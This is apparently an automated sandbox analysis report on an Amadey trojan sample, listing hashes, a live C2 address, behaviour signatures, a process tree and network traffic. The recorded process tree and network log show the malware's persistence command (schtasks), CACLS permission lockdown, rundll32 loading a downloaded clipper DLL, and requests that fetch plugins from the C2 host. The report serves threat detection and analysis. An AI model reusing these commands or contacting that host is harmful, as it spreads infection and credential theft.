Analysis

  • max time kernel
    110s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08/02/2023, 18:16 UTC

General

  • Target

    file.exe

  • Size

    567KB

  • MD5

    e0a1f899c2cb1a72500436f5b8337e10

  • SHA1

    135b0fa36c2430aeedb175fc75dbc861032088da

  • SHA256

    a251ecd0d64c00a88c41b8247952f68a31a7393775e6d962906de04cea2fc4f7

  • SHA512

    c66a540fc8d5945300ccdcef67b64569c806afa42ecd8b6d73565c6938102359ecdaa66a5f69f60273b1db28dbf9e519a8b36720badec591d8a137b7304cfbf3

  • SSDEEP

    12288:HMrpy90XrDCOHH5p1EfO+BTHl4tVWS1jaleKHA9ZdD0J:OyEDCOnJERV2XW1eKG0J

Malware Config

Extracted

Family

amadey

Version

3.66

C2

62.204.41.4/Gol478Ns/index.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 12 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 7 IoCs
  • Loads dropped DLL 1 IoCs
  • Windows security modification 2 TTPs 3 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 41 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:3796
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\bAFg.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\bAFg.exe
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:1884
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\aAFl.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\aAFl.exe
        3⤵
        • Modifies Windows Defender Real-time Protection settings
        • Executes dropped EXE
        • Windows security modification
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3920
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\nika.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\nika.exe
        3⤵
        • Modifies Windows Defender Real-time Protection settings
        • Executes dropped EXE
        • Windows security modification
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2524
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\xriv.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\xriv.exe
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4576
      • C:\Users\Admin\AppData\Local\Temp\4b9a106e76\mnolyk.exe
        "C:\Users\Admin\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1856
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\Admin\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
          4⤵
          • Creates scheduled task(s)
          PID:4496
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "Admin:N"&&CACLS "mnolyk.exe" /P "Admin:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "Admin:N"&&CACLS "..\4b9a106e76" /P "Admin:R" /E&&Exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2276
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            5⤵
              PID:3120
            • C:\Windows\SysWOW64\cacls.exe
              CACLS "mnolyk.exe" /P "Admin:N"
              5⤵
                PID:1948
              • C:\Windows\SysWOW64\cacls.exe
                CACLS "mnolyk.exe" /P "Admin:R" /E
                5⤵
                  PID:2456
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  5⤵
                    PID:2960
                  • C:\Windows\SysWOW64\cacls.exe
                    CACLS "..\4b9a106e76" /P "Admin:N"
                    5⤵
                      PID:3440
                    • C:\Windows\SysWOW64\cacls.exe
                      CACLS "..\4b9a106e76" /P "Admin:R" /E
                      5⤵
                        PID:1100
                    • C:\Windows\SysWOW64\rundll32.exe
                      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                      4⤵
                      • Loads dropped DLL
                      PID:4556
              • C:\Users\Admin\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                C:\Users\Admin\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                1⤵
                • Executes dropped EXE
                PID:3060
              • C:\Users\Admin\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                C:\Users\Admin\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                1⤵
                • Executes dropped EXE
                PID:1072

              Network

              • flag-ru
                POST
                http://62.204.41.4/Gol478Ns/index.php
                mnolyk.exe
                Remote address:
                62.204.41.4:80
                Request
                POST /Gol478Ns/index.php HTTP/1.1
                Content-Type: application/x-www-form-urlencoded
                Host: 62.204.41.4
                Content-Length: 89
                Cache-Control: no-cache
                Response
                HTTP/1.1 200 OK
                Server: nginx/1.18.0 (Ubuntu)
                Date: Wed, 08 Feb 2023 18:16:42 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: keep-alive
              • flag-ru
                GET
                http://62.204.41.4/Gol478Ns/Plugins/cred64.dll
                mnolyk.exe
                Remote address:
                62.204.41.4:80
                Request
                GET /Gol478Ns/Plugins/cred64.dll HTTP/1.1
                Host: 62.204.41.4
                Response
                HTTP/1.1 404 Not Found
                Server: nginx/1.18.0 (Ubuntu)
                Date: Wed, 08 Feb 2023 18:17:31 GMT
                Content-Type: text/html
                Content-Length: 162
                Connection: keep-alive
              • flag-ru
                GET
                http://62.204.41.4/Gol478Ns/Plugins/clip64.dll
                mnolyk.exe
                Remote address:
                62.204.41.4:80
                Request
                GET /Gol478Ns/Plugins/clip64.dll HTTP/1.1
                Host: 62.204.41.4
                Response
                HTTP/1.1 200 OK
                Server: nginx/1.18.0 (Ubuntu)
                Date: Wed, 08 Feb 2023 18:17:31 GMT
                Content-Type: application/octet-stream
                Content-Length: 91136
                Last-Modified: Fri, 03 Feb 2023 17:19:21 GMT
                Connection: keep-alive
                ETag: "63dd4219-16400"
                Accept-Ranges: bytes
              • 20.189.173.15:443
                322 B
                7
              • 62.204.41.4:80
                http://62.204.41.4/Gol478Ns/Plugins/clip64.dll
                http
                mnolyk.exe
                3.9kB
                94.9kB
                76
                75

                HTTP Request

                POST http://62.204.41.4/Gol478Ns/index.php

                HTTP Response

                200

                HTTP Request

                GET http://62.204.41.4/Gol478Ns/Plugins/cred64.dll

                HTTP Response

                404

                HTTP Request

                GET http://62.204.41.4/Gol478Ns/Plugins/clip64.dll

                HTTP Response

                200
              • 2.18.109.224:443
                322 B
                7
              No results found

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\4b9a106e76\mnolyk.exe

                Filesize

                236KB

                MD5

                8bb923c4d81284daef7896e5682df6c6

                SHA1

                67e34a96b77e44b666c5479f540995bdeacf5de2

                SHA256

                9b0410052289a8416a458401fbb9a74d6361f4769465431b209f32151d7c6f21

                SHA512

                2daed03277a343db5fcb22e26baea5cda41de39dc825fe0aad51f6ec181b8f38f09427f27fb58ffd179f37032600d107ef772cc6275f7d0d62899c6cd3f8aff7

              • C:\Users\Admin\AppData\Local\Temp\4b9a106e76\mnolyk.exe

                Filesize

                236KB

                MD5

                8bb923c4d81284daef7896e5682df6c6

                SHA1

                67e34a96b77e44b666c5479f540995bdeacf5de2

                SHA256

                9b0410052289a8416a458401fbb9a74d6361f4769465431b209f32151d7c6f21

                SHA512

                2daed03277a343db5fcb22e26baea5cda41de39dc825fe0aad51f6ec181b8f38f09427f27fb58ffd179f37032600d107ef772cc6275f7d0d62899c6cd3f8aff7

              • C:\Users\Admin\AppData\Local\Temp\4b9a106e76\mnolyk.exe

                Filesize

                236KB

                MD5

                8bb923c4d81284daef7896e5682df6c6

                SHA1

                67e34a96b77e44b666c5479f540995bdeacf5de2

                SHA256

                9b0410052289a8416a458401fbb9a74d6361f4769465431b209f32151d7c6f21

                SHA512

                2daed03277a343db5fcb22e26baea5cda41de39dc825fe0aad51f6ec181b8f38f09427f27fb58ffd179f37032600d107ef772cc6275f7d0d62899c6cd3f8aff7

              • C:\Users\Admin\AppData\Local\Temp\4b9a106e76\mnolyk.exe

                Filesize

                236KB

                MD5

                8bb923c4d81284daef7896e5682df6c6

                SHA1

                67e34a96b77e44b666c5479f540995bdeacf5de2

                SHA256

                9b0410052289a8416a458401fbb9a74d6361f4769465431b209f32151d7c6f21

                SHA512

                2daed03277a343db5fcb22e26baea5cda41de39dc825fe0aad51f6ec181b8f38f09427f27fb58ffd179f37032600d107ef772cc6275f7d0d62899c6cd3f8aff7

              • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\bAFg.exe

                Filesize

                380KB

                MD5

                1a9853416aa9e8810255d210fada5dec

                SHA1

                035f92f139d9f36f21a01955c8103c7e42709ee3

                SHA256

                75d95d28e1b7ffd920686a866073be94cd1435db280ebeb9809c6c9be5830028

                SHA512

                27ac133af108bb6da193760493423b0dd136036fc3d13bd5a0cb3f5c710c15bbba2b3fee8285719601c2632c4ec14db48ee3f1d15ce26e3595d4613dfd499c3f

              • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\bAFg.exe

                Filesize

                380KB

                MD5

                1a9853416aa9e8810255d210fada5dec

                SHA1

                035f92f139d9f36f21a01955c8103c7e42709ee3

                SHA256

                75d95d28e1b7ffd920686a866073be94cd1435db280ebeb9809c6c9be5830028

                SHA512

                27ac133af108bb6da193760493423b0dd136036fc3d13bd5a0cb3f5c710c15bbba2b3fee8285719601c2632c4ec14db48ee3f1d15ce26e3595d4613dfd499c3f

              • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\xriv.exe

                Filesize

                236KB

                MD5

                8bb923c4d81284daef7896e5682df6c6

                SHA1

                67e34a96b77e44b666c5479f540995bdeacf5de2

                SHA256

                9b0410052289a8416a458401fbb9a74d6361f4769465431b209f32151d7c6f21

                SHA512

                2daed03277a343db5fcb22e26baea5cda41de39dc825fe0aad51f6ec181b8f38f09427f27fb58ffd179f37032600d107ef772cc6275f7d0d62899c6cd3f8aff7

              • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\xriv.exe

                Filesize

                236KB

                MD5

                8bb923c4d81284daef7896e5682df6c6

                SHA1

                67e34a96b77e44b666c5479f540995bdeacf5de2

                SHA256

                9b0410052289a8416a458401fbb9a74d6361f4769465431b209f32151d7c6f21

                SHA512

                2daed03277a343db5fcb22e26baea5cda41de39dc825fe0aad51f6ec181b8f38f09427f27fb58ffd179f37032600d107ef772cc6275f7d0d62899c6cd3f8aff7

              • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\aAFl.exe

                Filesize

                364KB

                MD5

                06e19bf4f39f6e632d91be87a226312a

                SHA1

                cd0e1696ff00afb7d024eec8213a8f4e0228765c

                SHA256

                9b6b4589bf5411e47f02676d798e11b09d09980915210184c72c4b2f75203fdd

                SHA512

                0a52a1a2662a1781b5c41f82c542126c1d23854cb1b9a49c729241bd3de4d0a8feedc7dee1609429b3e0465a473e9d8e27ea28dfc4a41abec8ae3931f73f422c

              • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\aAFl.exe

                Filesize

                364KB

                MD5

                06e19bf4f39f6e632d91be87a226312a

                SHA1

                cd0e1696ff00afb7d024eec8213a8f4e0228765c

                SHA256

                9b6b4589bf5411e47f02676d798e11b09d09980915210184c72c4b2f75203fdd

                SHA512

                0a52a1a2662a1781b5c41f82c542126c1d23854cb1b9a49c729241bd3de4d0a8feedc7dee1609429b3e0465a473e9d8e27ea28dfc4a41abec8ae3931f73f422c

              • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\nika.exe

                Filesize

                11KB

                MD5

                7e93bacbbc33e6652e147e7fe07572a0

                SHA1

                421a7167da01c8da4dc4d5234ca3dd84e319e762

                SHA256

                850cd190aaeebcf1505674d97f51756f325e650320eaf76785d954223a9bee38

                SHA512

                250169d7b6fcebff400be89edae8340f14130ced70c340ba9da9f225f62b52b35f6645bfb510962efb866f988688cb42392561d3e6b72194bc89d310ea43aa91

              • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\nika.exe

                Filesize

                11KB

                MD5

                7e93bacbbc33e6652e147e7fe07572a0

                SHA1

                421a7167da01c8da4dc4d5234ca3dd84e319e762

                SHA256

                850cd190aaeebcf1505674d97f51756f325e650320eaf76785d954223a9bee38

                SHA512

                250169d7b6fcebff400be89edae8340f14130ced70c340ba9da9f225f62b52b35f6645bfb510962efb866f988688cb42392561d3e6b72194bc89d310ea43aa91

              • C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll

                Filesize

                89KB

                MD5

                c79b74d8fec5e7e2ba2f1789fd582a15

                SHA1

                78a1e5d99dbaccc5e07b125e1dfb280112cb3128

                SHA256

                b5bd049d32f0faeea6ce65a0f0d326de5bc4427a7c1ad24bfb0ea050c1dec7d3

                SHA512

                0debfc54904fd538cfb1fc648d18f90a991337200b3decf74b28ac2f341843fb3bab4f45bc92cfec333b18dfff9cc136854462e79054a39926a7bd8ee2e057ba

              • C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll

                Filesize

                89KB

                MD5

                c79b74d8fec5e7e2ba2f1789fd582a15

                SHA1

                78a1e5d99dbaccc5e07b125e1dfb280112cb3128

                SHA256

                b5bd049d32f0faeea6ce65a0f0d326de5bc4427a7c1ad24bfb0ea050c1dec7d3

                SHA512

                0debfc54904fd538cfb1fc648d18f90a991337200b3decf74b28ac2f341843fb3bab4f45bc92cfec333b18dfff9cc136854462e79054a39926a7bd8ee2e057ba

              • memory/2524-149-0x00007FF984230000-0x00007FF984CF1000-memory.dmp

                Filesize

                10.8MB

              • memory/2524-148-0x00007FF984230000-0x00007FF984CF1000-memory.dmp

                Filesize

                10.8MB

              • memory/2524-147-0x0000000000970000-0x000000000097A000-memory.dmp

                Filesize

                40KB

              • memory/3920-141-0x0000000000400000-0x000000000059A000-memory.dmp

                Filesize

                1.6MB

              • memory/3920-143-0x0000000000400000-0x000000000059A000-memory.dmp

                Filesize

                1.6MB

              • memory/3920-142-0x00000000006A3000-0x00000000006C3000-memory.dmp

                Filesize

                128KB

              • memory/3920-140-0x00000000021D0000-0x00000000021FD000-memory.dmp

                Filesize

                180KB

              • memory/3920-139-0x00000000006A3000-0x00000000006C3000-memory.dmp

                Filesize

                128KB

              • memory/3920-138-0x0000000004BA0000-0x0000000005144000-memory.dmp

                Filesize

                5.6MB

              We care about your privacy.

              This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.